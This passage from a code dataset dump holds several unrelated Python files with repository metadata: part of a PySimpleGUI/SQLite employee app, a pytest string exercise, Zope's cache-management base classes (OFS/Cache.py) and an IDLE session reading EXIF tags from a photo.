c = conn.cursor()
while (True):
c.execute("""SELECT empID, (l_name||\", \"||f_name||\" \"||m_name) as name FROM tb_emp_inactive""")
list_of_disabled_emp = c.fetchall()
names = []
for list_number,list_names in enumerate(list_of_disabled_emp):
dict_of_names = {'empID':list_names[0], 'names': list_names[1]}
empDetails = dict_of_names['empID'] +" - " + dict_of_names['names']
names.append(empDetails)
SetOptions(background_color='#77A1D3',text_element_background_color='#77A1D3',font='Raleway')
layout = [[sg.Listbox(values=(names), size=(30,8))],
[sg.Text(" "*15),sg.Button('Enable'), sg.Cancel()]]
window = sg.Window('Disabled Employees', auto_size_text=True, default_element_size=(40, 1)).Layout(layout)
event,values = window.Read()
if event == 'Enable':
try:
empID = values[0][0].split()[0]
c.execute ("""INSERT INTO tb_emp_info SELECT * FROM tb_emp_inactive WHERE empID =?""",(str(empID),))
conn.commit()
c.execute ("""DELETE FROM tb_emp_inactive WHERE empID=?""",(str(empID),))
conn.commit()
window.Close()
c.execute("""SELECT * FROM tb_emp_info """)
result = c.fetchall()
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
except IndexError:
sg.Popup('Select an employee!')
window.Close()
else:
window.Close()
break
def closeWindow(self):
window.close()
if __name__=='__main__':
import sys
app=QtWidgets.QApplication(sys.argv)
window=Ui_Registration2()
window.show()
sys.exit(app.exec_())
| 26,987 | 37 | 588 |
c5a131ddc452e6c9f18660f40d2b82d17ee59d7d | 467 | py | Python | Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch04_strings/ex06_remove_duplicates_test.py | Kreijeck/learning | eaffee08e61f2a34e01eb8f9f04519aac633f48c | [
"MIT"
] | null | null | null | Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch04_strings/ex06_remove_duplicates_test.py | Kreijeck/learning | eaffee08e61f2a34e01eb8f9f04519aac633f48c | [
"MIT"
] | null | null | null | Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch04_strings/ex06_remove_duplicates_test.py | Kreijeck/learning | eaffee08e61f2a34e01eb8f9f04519aac633f48c | [
"MIT"
] | null | null | null | # Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch04_strings.solutions.ex06_remove_duplicates import remove_duplicates
@pytest.mark.parametrize("input, expected",
[("bananas", "bans"),
("lalalamama", "lam"),
("MICHAEL", "MICHAEL") ])
| 27.470588 | 75 | 0.633833 | # Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch04_strings.solutions.ex06_remove_duplicates import remove_duplicates
@pytest.mark.parametrize("input, expected",
[("bananas", "bans"),
("lalalamama", "lam"),
("MICHAEL", "MICHAEL") ])
def test_remove_duplicates(input, expected):
assert remove_duplicates(input) == expected
| 71 | 0 | 22 |
7fd34551b06770f4fbb94ded3fca72745a67740c | 18,380 | py | Python | src/OFS/Cache.py | hitotsunorb1/Zope | 6beac6385e1a302903889561385013874ef94cb1 | [
"ZPL-2.1"
] | null | null | null | src/OFS/Cache.py | hitotsunorb1/Zope | 6beac6385e1a302903889561385013874ef94cb1 | [
"ZPL-2.1"
] | 1 | 2020-11-11T07:11:31.000Z | 2020-11-11T07:11:31.000Z | src/OFS/Cache.py | hitotsunorb1/Zope | 6beac6385e1a302903889561385013874ef94cb1 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Cacheable object and cache management base classes.
"""
import sys
import time
from logging import getLogger
from AccessControl.class_init import InitializeClass
from AccessControl.Permissions import view_management_screens
from AccessControl.SecurityInfo import ClassSecurityInfo
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.unauthorized import Unauthorized
from Acquisition import aq_acquire
from Acquisition import aq_base
from Acquisition import aq_get
from Acquisition import aq_inner
from Acquisition import aq_parent
from App.special_dtml import DTMLFile
ZCM_MANAGERS = '__ZCacheManager_ids__'
ViewManagementScreensPermission = view_management_screens
ChangeCacheSettingsPermission = 'Change cache settings'
LOG = getLogger('Cache')
def filterCacheManagers(orig, container, name, value, extra):
"""
This is a filter method for aq_acquire.
It causes objects to be found only if they are
in the list of cache managers.
"""
if hasattr(aq_base(container), ZCM_MANAGERS) and \
name in getattr(container, ZCM_MANAGERS):
return 1
return 0
def getVerifiedManagerIds(container):
"""Gets the list of cache managers in a container, verifying each one."""
ids = getattr(container, ZCM_MANAGERS, ())
rval = []
for id in ids:
if getattr(getattr(container, id, None), '_isCacheManager', 0):
rval.append(id)
return tuple(rval)
# Anytime a CacheManager is added or removed, all _v_ZCacheable_cache
# attributes must be invalidated. manager_timestamp is a way to do
# that.
manager_timestamp = 0
class Cacheable(object):
"""Mix-in for cacheable objects."""
manage_options = (
{
'label': 'Cache',
'action': 'ZCacheable_manage',
'filter': filterCacheTab,
},
)
security = ClassSecurityInfo()
security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))
security.declareProtected(ViewManagementScreensPermission, 'ZCacheable_manage') # NOQA: D001,E501
ZCacheable_manage = DTMLFile('dtml/cacheable', globals())
_v_ZCacheable_cache = None
_v_ZCacheable_manager_timestamp = 0
__manager_id = None
__enabled = True
_isCacheable = True
@security.private
def ZCacheable_getManager(self):
"""Returns the currently associated cache manager."""
manager_id = self.__manager_id
if manager_id is None:
return None
try:
return aq_acquire(
self,
manager_id,
containment=1,
filter=filterCacheManagers,
extra=None,
default=None
)
except AttributeError:
return None
@security.private
def ZCacheable_getCache(self):
"""Gets the cache associated with this object.
"""
if self.__manager_id is None:
return None
c = self._v_ZCacheable_cache
if c is not None:
# We have a volatile reference to the cache.
if self._v_ZCacheable_manager_timestamp == manager_timestamp:
return aq_base(c)
manager = self.ZCacheable_getManager()
if manager is not None:
c = aq_base(manager.ZCacheManager_getCache())
else:
return None
# Set a volatile reference to the cache then return it.
self._v_ZCacheable_cache = c
self._v_ZCacheable_manager_timestamp = manager_timestamp
return c
@security.private
def ZCacheable_isCachingEnabled(self):
"""
Returns true only if associated with a cache manager and
caching of this method is enabled.
"""
return self.__enabled and self.ZCacheable_getCache()
@security.private
@security.private
def ZCacheable_get(
self,
view_name='',
keywords=None,
mtime_func=None,
default=None
):
"""Retrieves the cached view for the object under the
conditions specified by keywords. If the value is
not yet cached, returns the default.
"""
c = self.ZCacheable_getCache()
if c is not None and self.__enabled:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
val = c.ZCache_get(ob, view_name, keywords,
mtime_func, default)
return val
except Exception:
LOG.warning('ZCache_get() exception')
return default
return default
@security.private
def ZCacheable_set(
self,
data,
view_name='',
keywords=None,
mtime_func=None
):
"""Cacheable views should call this method after generating
cacheable results. The data argument can be of any Python type.
"""
c = self.ZCacheable_getCache()
if c is not None and self.__enabled:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
c.ZCache_set(ob, data, view_name, keywords,
mtime_func)
except Exception:
LOG.warning('ZCache_set() exception')
@security.protected(ViewManagementScreensPermission)
def ZCacheable_invalidate(self, view_name='', REQUEST=None):
"""Called after a cacheable object is edited. Causes all
cache entries that apply to the view_name to be removed.
Returns a status message.
"""
c = self.ZCacheable_getCache()
if c is not None:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
message = c.ZCache_invalidate(ob)
if not message:
message = 'Invalidated.'
except Exception:
exc = sys.exc_info()
try:
LOG.warning('ZCache_invalidate() exception')
message = 'An exception occurred: %s: %s' % exc[:2]
finally:
exc = None
else:
message = 'This object is not associated with a cache manager.'
if REQUEST is not None:
return self.ZCacheable_manage(
self, REQUEST, management_view='Cache',
manage_tabs_message=message)
return message
@security.private
def ZCacheable_getModTime(self, mtime_func=None):
"""Returns the highest of the last mod times."""
# Based on:
# mtime_func
# self.mtime
# self.__class__.mtime
mtime = 0
if mtime_func:
# Allow mtime_func to influence the mod time.
mtime = mtime_func()
base = aq_base(self)
mtime = max(getattr(base, '_p_mtime', mtime) or 0, mtime)
klass = getattr(base, '__class__', None)
if klass:
klass_mtime = getattr(klass, '_p_mtime', mtime)
if isinstance(klass_mtime, int):
mtime = max(klass_mtime, mtime)
return mtime
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerId(self):
"""Returns the id of the current ZCacheManager."""
return self.__manager_id
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerURL(self):
"""Returns the URL of the current ZCacheManager."""
manager = self.ZCacheable_getManager()
if manager is not None:
return manager.absolute_url()
return None
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerIds(self):
"""Returns a list of mappings containing the id and title
of the available ZCacheManagers."""
rval = []
ob = self
used_ids = {}
while ob is not None:
if hasattr(aq_base(ob), ZCM_MANAGERS):
ids = getattr(ob, ZCM_MANAGERS)
for id in ids:
manager = getattr(ob, id, None)
if manager is not None:
id = manager.getId()
if id not in used_ids:
title = getattr(aq_base(manager), 'title', '')
rval.append({'id': id, 'title': title})
used_ids[id] = 1
ob = aq_parent(aq_inner(ob))
return tuple(rval)
@security.protected(ChangeCacheSettingsPermission)
def ZCacheable_setManagerId(self, manager_id, REQUEST=None):
"""Changes the manager_id for this object."""
self.ZCacheable_invalidate()
if not manager_id:
# User requested disassociation
# from the cache manager.
manager_id = None
else:
manager_id = str(manager_id)
self.__manager_id = manager_id
self._v_ZCacheable_cache = None
if REQUEST is not None:
return self.ZCacheable_manage(
self,
REQUEST,
management_view='Cache',
manage_tabs_message='Cache settings changed.'
)
@security.protected(ViewManagementScreensPermission)
def ZCacheable_enabled(self):
"""Returns true if caching is enabled for this object or method."""
return self.__enabled
@security.protected(ChangeCacheSettingsPermission)
def ZCacheable_setEnabled(self, enabled=0, REQUEST=None):
"""Changes the enabled flag."""
self.__enabled = enabled and 1 or 0
if REQUEST is not None:
return self.ZCacheable_manage(
self, REQUEST, management_view='Cache',
manage_tabs_message='Cache settings changed.')
@security.protected(ViewManagementScreensPermission)
def ZCacheable_configHTML(self):
"""Override to provide configuration of caching
behavior that can only be specific to the cacheable object.
"""
return ''
InitializeClass(Cacheable)
def findCacheables(
ob,
manager_id,
require_assoc,
subfolders,
meta_types,
rval,
path
):
"""
Used by the CacheManager UI. Recursive. Similar to the Zope
"Find" function. Finds all Cacheable objects in a hierarchy.
"""
try:
if meta_types:
subobs = ob.objectValues(meta_types)
else:
subobs = ob.objectValues()
sm = getSecurityManager()
# Add to the list of cacheable objects.
for subob in subobs:
if not isCacheable(subob):
continue
associated = (subob.ZCacheable_getManagerId() == manager_id)
if require_assoc and not associated:
continue
if not sm.checkPermission('Change cache settings', subob):
continue
subpath = path + (subob.getId(),)
info = {
'sortkey': subpath,
'path': '/'.join(subpath),
'title': getattr(aq_base(subob), 'title', ''),
'icon': None,
'associated': associated,
}
rval.append(info)
# Visit subfolders.
if subfolders:
if meta_types:
subobs = ob.objectValues()
for subob in subobs:
subpath = path + (subob.getId(),)
if hasattr(aq_base(subob), 'objectValues'):
if sm.checkPermission(
'Access contents information', subob):
findCacheables(
subob, manager_id, require_assoc,
subfolders, meta_types, rval, subpath)
except Exception:
# Ignore exceptions.
import traceback
traceback.print_exc()
class Cache(object):
"""
A base class (and interface description) for caches.
Note that Cache objects are not intended to be visible by
restricted code.
"""
class CacheManager(object):
"""
A base class for cache managers. Implement ZCacheManager_getCache().
"""
security = ClassSecurityInfo()
security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))
@security.private
_isCacheManager = 1
manage_options = (
{
'label': 'Associate',
'action': 'ZCacheManager_associate',
},
)
security.declareProtected(ChangeCacheSettingsPermission, 'ZCacheManager_associate') # NOQA: D001,E501
ZCacheManager_associate = DTMLFile('dtml/cmassoc', globals())
@security.protected(ChangeCacheSettingsPermission)
def ZCacheManager_locate(
self,
require_assoc,
subfolders,
meta_types=[],
REQUEST=None
):
"""Locates cacheable objects.
"""
ob = aq_parent(aq_inner(self))
rval = []
manager_id = self.getId()
if '' in meta_types:
# User selected "All".
meta_types = []
findCacheables(
ob,
manager_id,
require_assoc,
subfolders,
meta_types,
rval,
()
)
if REQUEST is not None:
return self.ZCacheManager_associate(
self,
REQUEST,
show_results=1,
results=rval,
management_view="Associate"
)
return rval
@security.protected(ChangeCacheSettingsPermission)
def ZCacheManager_setAssociations(self, props=None, REQUEST=None):
"""Associates and un-associates cacheable objects with this
cache manager.
"""
addcount = 0
remcount = 0
parent = aq_parent(aq_inner(self))
sm = getSecurityManager()
my_id = str(self.getId())
if props is None:
props = REQUEST.form
for key, do_associate in props.items():
if key[:10] == 'associate_':
path = key[10:]
ob = parent.restrictedTraverse(path)
if not sm.checkPermission('Change cache settings', ob):
raise Unauthorized
if not isCacheable(ob):
# Not a cacheable object.
continue
manager_id = str(ob.ZCacheable_getManagerId())
if do_associate:
if manager_id != my_id:
ob.ZCacheable_setManagerId(my_id)
addcount = addcount + 1
else:
if manager_id == my_id:
ob.ZCacheable_setManagerId(None)
remcount = remcount + 1
if REQUEST is not None:
return self.ZCacheManager_associate(
self, REQUEST, management_view="Associate",
manage_tabs_message='%d association(s) made, %d removed.' %
(addcount, remcount)
)
InitializeClass(CacheManager)
| 33.601463 | 106 | 0.591621 | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Cacheable object and cache management base classes.
"""
import sys
import time
from logging import getLogger
from AccessControl.class_init import InitializeClass
from AccessControl.Permissions import view_management_screens
from AccessControl.SecurityInfo import ClassSecurityInfo
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.unauthorized import Unauthorized
from Acquisition import aq_acquire
from Acquisition import aq_base
from Acquisition import aq_get
from Acquisition import aq_inner
from Acquisition import aq_parent
from App.special_dtml import DTMLFile
ZCM_MANAGERS = '__ZCacheManager_ids__'
ViewManagementScreensPermission = view_management_screens
ChangeCacheSettingsPermission = 'Change cache settings'
LOG = getLogger('Cache')
def isCacheable(ob):
return getattr(aq_base(ob), '_isCacheable', 0)
def managersExist(ob):
# Returns 1 if any CacheManagers exist in the context of ob.
if aq_get(ob, ZCM_MANAGERS, None, 1):
return 1
return 0
def filterCacheTab(ob):
return managersExist(ob)
def filterCacheManagers(orig, container, name, value, extra):
"""
This is a filter method for aq_acquire.
It causes objects to be found only if they are
in the list of cache managers.
"""
if hasattr(aq_base(container), ZCM_MANAGERS) and \
name in getattr(container, ZCM_MANAGERS):
return 1
return 0
def getVerifiedManagerIds(container):
"""Gets the list of cache managers in a container, verifying each one."""
ids = getattr(container, ZCM_MANAGERS, ())
rval = []
for id in ids:
if getattr(getattr(container, id, None), '_isCacheManager', 0):
rval.append(id)
return tuple(rval)
# Anytime a CacheManager is added or removed, all _v_ZCacheable_cache
# attributes must be invalidated. manager_timestamp is a way to do
# that.
manager_timestamp = 0
class Cacheable(object):
"""Mix-in for cacheable objects."""
manage_options = (
{
'label': 'Cache',
'action': 'ZCacheable_manage',
'filter': filterCacheTab,
},
)
security = ClassSecurityInfo()
security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))
security.declareProtected(ViewManagementScreensPermission, 'ZCacheable_manage') # NOQA: D001,E501
ZCacheable_manage = DTMLFile('dtml/cacheable', globals())
_v_ZCacheable_cache = None
_v_ZCacheable_manager_timestamp = 0
__manager_id = None
__enabled = True
_isCacheable = True
@security.private
def ZCacheable_getManager(self):
"""Returns the currently associated cache manager."""
manager_id = self.__manager_id
if manager_id is None:
return None
try:
return aq_acquire(
self,
manager_id,
containment=1,
filter=filterCacheManagers,
extra=None,
default=None
)
except AttributeError:
return None
@security.private
def ZCacheable_getCache(self):
"""Gets the cache associated with this object.
"""
if self.__manager_id is None:
return None
c = self._v_ZCacheable_cache
if c is not None:
# We have a volatile reference to the cache.
if self._v_ZCacheable_manager_timestamp == manager_timestamp:
return aq_base(c)
manager = self.ZCacheable_getManager()
if manager is not None:
c = aq_base(manager.ZCacheManager_getCache())
else:
return None
# Set a volatile reference to the cache then return it.
self._v_ZCacheable_cache = c
self._v_ZCacheable_manager_timestamp = manager_timestamp
return c
@security.private
def ZCacheable_isCachingEnabled(self):
"""
Returns true only if associated with a cache manager and
caching of this method is enabled.
"""
return self.__enabled and self.ZCacheable_getCache()
@security.private
def ZCacheable_getObAndView(self, view_name):
# Returns self and view_name unchanged.
return self, view_name
@security.private
def ZCacheable_get(
self,
view_name='',
keywords=None,
mtime_func=None,
default=None
):
"""Retrieves the cached view for the object under the
conditions specified by keywords. If the value is
not yet cached, returns the default.
"""
c = self.ZCacheable_getCache()
if c is not None and self.__enabled:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
val = c.ZCache_get(ob, view_name, keywords,
mtime_func, default)
return val
except Exception:
LOG.warning('ZCache_get() exception')
return default
return default
@security.private
def ZCacheable_set(
self,
data,
view_name='',
keywords=None,
mtime_func=None
):
"""Cacheable views should call this method after generating
cacheable results. The data argument can be of any Python type.
"""
c = self.ZCacheable_getCache()
if c is not None and self.__enabled:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
c.ZCache_set(ob, data, view_name, keywords,
mtime_func)
except Exception:
LOG.warning('ZCache_set() exception')
@security.protected(ViewManagementScreensPermission)
def ZCacheable_invalidate(self, view_name='', REQUEST=None):
"""Called after a cacheable object is edited. Causes all
cache entries that apply to the view_name to be removed.
Returns a status message.
"""
c = self.ZCacheable_getCache()
if c is not None:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
message = c.ZCache_invalidate(ob)
if not message:
message = 'Invalidated.'
except Exception:
exc = sys.exc_info()
try:
LOG.warning('ZCache_invalidate() exception')
message = 'An exception occurred: %s: %s' % exc[:2]
finally:
exc = None
else:
message = 'This object is not associated with a cache manager.'
if REQUEST is not None:
return self.ZCacheable_manage(
self, REQUEST, management_view='Cache',
manage_tabs_message=message)
return message
@security.private
def ZCacheable_getModTime(self, mtime_func=None):
"""Returns the highest of the last mod times."""
# Based on:
# mtime_func
# self.mtime
# self.__class__.mtime
mtime = 0
if mtime_func:
# Allow mtime_func to influence the mod time.
mtime = mtime_func()
base = aq_base(self)
mtime = max(getattr(base, '_p_mtime', mtime) or 0, mtime)
klass = getattr(base, '__class__', None)
if klass:
klass_mtime = getattr(klass, '_p_mtime', mtime)
if isinstance(klass_mtime, int):
mtime = max(klass_mtime, mtime)
return mtime
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerId(self):
"""Returns the id of the current ZCacheManager."""
return self.__manager_id
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerURL(self):
"""Returns the URL of the current ZCacheManager."""
manager = self.ZCacheable_getManager()
if manager is not None:
return manager.absolute_url()
return None
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerIds(self):
"""Returns a list of mappings containing the id and title
of the available ZCacheManagers."""
rval = []
ob = self
used_ids = {}
while ob is not None:
if hasattr(aq_base(ob), ZCM_MANAGERS):
ids = getattr(ob, ZCM_MANAGERS)
for id in ids:
manager = getattr(ob, id, None)
if manager is not None:
id = manager.getId()
if id not in used_ids:
title = getattr(aq_base(manager), 'title', '')
rval.append({'id': id, 'title': title})
used_ids[id] = 1
ob = aq_parent(aq_inner(ob))
return tuple(rval)
@security.protected(ChangeCacheSettingsPermission)
def ZCacheable_setManagerId(self, manager_id, REQUEST=None):
"""Changes the manager_id for this object."""
self.ZCacheable_invalidate()
if not manager_id:
# User requested disassociation
# from the cache manager.
manager_id = None
else:
manager_id = str(manager_id)
self.__manager_id = manager_id
self._v_ZCacheable_cache = None
if REQUEST is not None:
return self.ZCacheable_manage(
self,
REQUEST,
management_view='Cache',
manage_tabs_message='Cache settings changed.'
)
@security.protected(ViewManagementScreensPermission)
def ZCacheable_enabled(self):
"""Returns true if caching is enabled for this object or method."""
return self.__enabled
@security.protected(ChangeCacheSettingsPermission)
def ZCacheable_setEnabled(self, enabled=0, REQUEST=None):
"""Changes the enabled flag."""
self.__enabled = enabled and 1 or 0
if REQUEST is not None:
return self.ZCacheable_manage(
self, REQUEST, management_view='Cache',
manage_tabs_message='Cache settings changed.')
@security.protected(ViewManagementScreensPermission)
def ZCacheable_configHTML(self):
"""Override to provide configuration of caching
behavior that can only be specific to the cacheable object.
"""
return ''
InitializeClass(Cacheable)
def findCacheables(
ob,
manager_id,
require_assoc,
subfolders,
meta_types,
rval,
path
):
"""
Used by the CacheManager UI. Recursive. Similar to the Zope
"Find" function. Finds all Cacheable objects in a hierarchy.
"""
try:
if meta_types:
subobs = ob.objectValues(meta_types)
else:
subobs = ob.objectValues()
sm = getSecurityManager()
# Add to the list of cacheable objects.
for subob in subobs:
if not isCacheable(subob):
continue
associated = (subob.ZCacheable_getManagerId() == manager_id)
if require_assoc and not associated:
continue
if not sm.checkPermission('Change cache settings', subob):
continue
subpath = path + (subob.getId(),)
info = {
'sortkey': subpath,
'path': '/'.join(subpath),
'title': getattr(aq_base(subob), 'title', ''),
'icon': None,
'associated': associated,
}
rval.append(info)
# Visit subfolders.
if subfolders:
if meta_types:
subobs = ob.objectValues()
for subob in subobs:
subpath = path + (subob.getId(),)
if hasattr(aq_base(subob), 'objectValues'):
if sm.checkPermission(
'Access contents information', subob):
findCacheables(
subob, manager_id, require_assoc,
subfolders, meta_types, rval, subpath)
except Exception:
# Ignore exceptions.
import traceback
traceback.print_exc()
class Cache(object):
"""
A base class (and interface description) for caches.
Note that Cache objects are not intended to be visible by
restricted code.
"""
def ZCache_invalidate(self, ob):
raise NotImplementedError
def ZCache_get(self, ob, view_name, keywords, mtime_func, default):
# view_name: If an object provides different views that would
# benefit from caching, it will set view_name.
# Otherwise view_name will be an empty string.
#
# keywords: Either None or a mapping containing keys that
# distinguish this cache entry from others even though
# ob and view_name are the same. DTMLMethods use keywords
# derived from the DTML namespace.
#
# mtime_func: When the Cache calls ZCacheable_getModTime(),
# it should pass this as an argument. It is provided to
# allow cacheable objects to provide their own computation
# of the object's modification time.
#
# default: If no entry is found, ZCache_get() should return
# default.
raise NotImplementedError
def ZCache_set(self, ob, data, view_name, keywords, mtime_func):
# See ZCache_get() for parameter descriptions.
raise NotImplementedError
class CacheManager(object):
"""
A base class for cache managers. Implement ZCacheManager_getCache().
"""
security = ClassSecurityInfo()
security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))
@security.private
def ZCacheManager_getCache(self):
raise NotImplementedError
_isCacheManager = 1
manage_options = (
{
'label': 'Associate',
'action': 'ZCacheManager_associate',
},
)
def manage_afterAdd(self, item, container):
# Adds self to the list of cache managers in the container.
if aq_base(self) is aq_base(item):
ids = getVerifiedManagerIds(container)
id = self.getId()
if id not in ids:
setattr(container, ZCM_MANAGERS, ids + (id,))
global manager_timestamp
manager_timestamp = time.time()
def manage_beforeDelete(self, item, container):
# Removes self from the list of cache managers.
if aq_base(self) is aq_base(item):
ids = getVerifiedManagerIds(container)
id = self.getId()
if id in ids:
manager_ids = [s for s in ids if s != id]
if manager_ids:
setattr(container, ZCM_MANAGERS, manager_ids)
elif getattr(aq_base(self), ZCM_MANAGERS, None) is not None:
delattr(self, ZCM_MANAGERS)
global manager_timestamp
manager_timestamp = time.time()
security.declareProtected(ChangeCacheSettingsPermission, 'ZCacheManager_associate') # NOQA: D001,E501
ZCacheManager_associate = DTMLFile('dtml/cmassoc', globals())
@security.protected(ChangeCacheSettingsPermission)
def ZCacheManager_locate(
self,
require_assoc,
subfolders,
meta_types=[],
REQUEST=None
):
"""Locates cacheable objects.
"""
ob = aq_parent(aq_inner(self))
rval = []
manager_id = self.getId()
if '' in meta_types:
# User selected "All".
meta_types = []
findCacheables(
ob,
manager_id,
require_assoc,
subfolders,
meta_types,
rval,
()
)
if REQUEST is not None:
return self.ZCacheManager_associate(
self,
REQUEST,
show_results=1,
results=rval,
management_view="Associate"
)
return rval
@security.protected(ChangeCacheSettingsPermission)
def ZCacheManager_setAssociations(self, props=None, REQUEST=None):
"""Associates and un-associates cacheable objects with this
cache manager.
"""
addcount = 0
remcount = 0
parent = aq_parent(aq_inner(self))
sm = getSecurityManager()
my_id = str(self.getId())
if props is None:
props = REQUEST.form
for key, do_associate in props.items():
if key[:10] == 'associate_':
path = key[10:]
ob = parent.restrictedTraverse(path)
if not sm.checkPermission('Change cache settings', ob):
raise Unauthorized
if not isCacheable(ob):
# Not a cacheable object.
continue
manager_id = str(ob.ZCacheable_getManagerId())
if do_associate:
if manager_id != my_id:
ob.ZCacheable_setManagerId(my_id)
addcount = addcount + 1
else:
if manager_id == my_id:
ob.ZCacheable_setManagerId(None)
remcount = remcount + 1
if REQUEST is not None:
return self.ZCacheManager_associate(
self, REQUEST, management_view="Associate",
manage_tabs_message='%d association(s) made, %d removed.' %
(addcount, remcount)
)
InitializeClass(CacheManager)
| 2,421 | 0 | 256 |
6d5b358806daeac1d711a019e32d0fd9b2e7663a | 1,830 | py | Python | Planeacion vuelo.py | ogarcia1704/Planeacion-del-vuelo-de-Dron | dc8a4ae818463c5450a5dfb8045c8361a8dfab71 | [
"MIT"
] | null | null | null | Planeacion vuelo.py | ogarcia1704/Planeacion-del-vuelo-de-Dron | dc8a4ae818463c5450a5dfb8045c8361a8dfab71 | [
"MIT"
] | null | null | null | Planeacion vuelo.py | ogarcia1704/Planeacion-del-vuelo-de-Dron | dc8a4ae818463c5450a5dfb8045c8361a8dfab71 | [
"MIT"
] | null | null | null | Python 3.7.3 (v3.7.3:ef4ec6ed12, Mar 25 2019, 21:26:53) [MSC v.1916 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license()" for more information.
>>> from exif import Image
>>> with open('C:\\Users\\oswal\\Pictures\\oswaldo.jpg', 'rb') as image_file:
... my_image = Image(image_file)
...
>>> dir(my_image)
['_exif_ifd_pointer', '_gps_ifd_pointer', '_interoperability_ifd_Pointer', '_segments', 'cfa_pattern', 'color_space', 'components_configuration', 'compressed_bits_per_pixel', 'compression', 'contrast', 'custom_rendered', 'datetime', 'datetime_digitized', 'datetime_original', 'digital_zoom_ratio', 'exif_version', 'exposure_bias_value', 'exposure_mode', 'exposure_program', 'exposure_time', 'f_number', 'file_source', 'flash', 'flashpix_version', 'focal_length', 'focal_length_in_35mm_film', 'gain_control', 'get', 'get_file', 'gps_altitude', 'gps_altitude_ref', 'gps_datestamp', 'gps_latitude', 'gps_latitude_ref', 'gps_longitude', 'gps_longitude_ref', 'gps_map_datum', 'gps_satellites', 'gps_timestamp', 'gps_version_id', 'jpeg_interchange_format', 'jpeg_interchange_format_length', 'light_source', 'make', 'maker_note', 'max_aperture_value', 'metering_mode', 'model', 'orientation', 'photographic_sensitivity', 'pixel_x_dimension', 'pixel_y_dimension', 'resolution_unit', 'saturation', 'scene_capture_type', 'scene_type', 'sensing_method', 'sensitivity_type', 'sharpness', 'software', 'subject_distance_range', 'subsec_time', 'subsec_time_digitized', 'subsec_time_original', 'user_comment', 'white_balance', 'x_resolution', 'y_and_c_positioning', 'y_resolution']
>>> import pandas as pd
>>> data = pd.DataFrame(dir(my_image))
>>> datatoexcel = pd.ExcelWriter("CaracteristicasImagen.xlsx",engine='xlsxwriter')
>>> data.to_excel(datatoexcel, sheet_name='Sheet1')
>>> datatoexcel.save()
| 130.714286 | 1,266 | 0.747541 | Python 3.7.3 (v3.7.3:ef4ec6ed12, Mar 25 2019, 21:26:53) [MSC v.1916 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license()" for more information.
>>> from exif import Image
>>> with open('C:\\Users\\oswal\\Pictures\\oswaldo.jpg', 'rb') as image_file:
... my_image = Image(image_file)
...
>>> dir(my_image)
['_exif_ifd_pointer', '_gps_ifd_pointer', '_interoperability_ifd_Pointer', '_segments', 'cfa_pattern', 'color_space', 'components_configuration', 'compressed_bits_per_pixel', 'compression', 'contrast', 'custom_rendered', 'datetime', 'datetime_digitized', 'datetime_original', 'digital_zoom_ratio', 'exif_version', 'exposure_bias_value', 'exposure_mode', 'exposure_program', 'exposure_time', 'f_number', 'file_source', 'flash', 'flashpix_version', 'focal_length', 'focal_length_in_35mm_film', 'gain_control', 'get', 'get_file', 'gps_altitude', 'gps_altitude_ref', 'gps_datestamp', 'gps_latitude', 'gps_latitude_ref', 'gps_longitude', 'gps_longitude_ref', 'gps_map_datum', 'gps_satellites', 'gps_timestamp', 'gps_version_id', 'jpeg_interchange_format', 'jpeg_interchange_format_length', 'light_source', 'make', 'maker_note', 'max_aperture_value', 'metering_mode', 'model', 'orientation', 'photographic_sensitivity', 'pixel_x_dimension', 'pixel_y_dimension', 'resolution_unit', 'saturation', 'scene_capture_type', 'scene_type', 'sensing_method', 'sensitivity_type', 'sharpness', 'software', 'subject_distance_range', 'subsec_time', 'subsec_time_digitized', 'subsec_time_original', 'user_comment', 'white_balance', 'x_resolution', 'y_and_c_positioning', 'y_resolution']
>>> import pandas as pd
>>> data = pd.DataFrame(dir(my_image))
